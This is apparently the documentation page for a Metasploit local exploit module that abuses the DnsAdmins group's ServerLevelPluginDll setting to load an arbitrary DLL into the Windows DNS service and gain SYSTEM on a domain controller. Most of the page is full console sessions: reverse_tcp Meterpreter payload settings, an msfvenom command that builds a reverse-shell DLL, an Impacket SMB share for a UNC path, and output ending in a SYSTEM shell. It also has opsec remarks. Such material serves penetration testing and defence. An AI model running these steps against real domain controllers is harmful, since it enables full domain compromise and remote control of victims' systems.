ide0x90
10 KiB
10 KiB
Introduction
This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\
named ServerLevelPluginDll that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended when using a UNC path.
Vulnerable Application
Windows Server 2003 and above
Verification Steps
- Get a Meterpreter shell
use exploit/windows/local/dnsadmin_serverlevelplugindllset PAYLOAD <payload>. Payload architecture must be the same as the target systemset LHOST <lhost>set LPORT <lport>set SESSION <session_no>to specify sessionset DLLNAME <dllname>if you want to name your DLL something other thanmsf.dllset DLLPATH <dllpath>if you want to place your DLL somewhere other than%TEMP%or want to use a UNC pathset MAKEDLL trueif you want to just make the DLL, and not carry out the exploitexploitto get SYSTEM shell ifMAKEDLLis set tofalse, or to write the DLL to the~/.msf4/localfolder ifMAKEDLLis set totrue
Options
DLLNAME
Name of the DLL to use.
DLLPATH
Location of the DLL to use. If a UNC path is provided, the module assumes that the operator already has the prerequisites:
- A working SMB2 share (use Impacket's
smbserver.pyto quickly set up one) - A DLL of the same architecture as the target system
MAKEDLL
Just create the DLL, do not exploit.
Will create a DLL in the ~/.msf4/local directory if set to true
Scenarios
Windows Server 2019 Standard x64, writing msf.dll to %TEMP%
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56312 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Building DLL...
[*] Writing DLL to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[*] Modifying ServerLevelPluginDll to point to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800
meterpreter >
[*] Erasing ServerLevelPluginDll registry value...
[*] Removing C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
meterpreter > sysinfo
Computer : DC01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : BASILISKCORP
Logged On Users : 16
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
The fastest way to get a share up and running is to use Impacket's smbserver:
msfdev2@automata-ng:~$ mkdir ~/test; sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ~/test
[sudo] password for msfdev2:
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
You can generate a DLL using the module by setting MAKEDLL to true:
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56307 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >
Once the DLL has been generated, copy it to the folder shared by Impacket's smbserver:
msfdev2@automata-ng:~$ cp /home/msfdev2/.msf4/local/test.dll ~/test/test.dll
msfdev2@automata-ng:~$
Alternatively, you can generate a DLL using msfvenom:
msfdev2@automata-ng:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o ~/test/test.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
Saved as: /home/msfdev2/test/test.dll
msfdev2@automata-ng:~$
After that, proceed with the actual exploit:
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
MAKEDLL => false
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
DLLPATH => \\192.168.137.139\test
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Using user-provided UNC path.
[*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56493) at 2020-05-16 03:45:09 +0800
meterpreter > sysinfo
Computer : DC01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : BASILISKCORP
Logged On Users : 18
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows Server 2019 Standard x64, just creating DLL
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56478 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >
Notes
- This module is not particularly opsec-safe as it drops a DLL to disk, writes to the registry, and is sure to generate a ton of event logs when the DNS service is stopped and restarted.
- The service will crash if the DLL used does not contain the right exports, so using the
msfvenomgenerated DLL will definitely cause it to crash. - Automatic cleanup of the dropped DLL is attempted if the DLL has been written to disk, but if automatic cleanup fails manual cleanup may be necessary.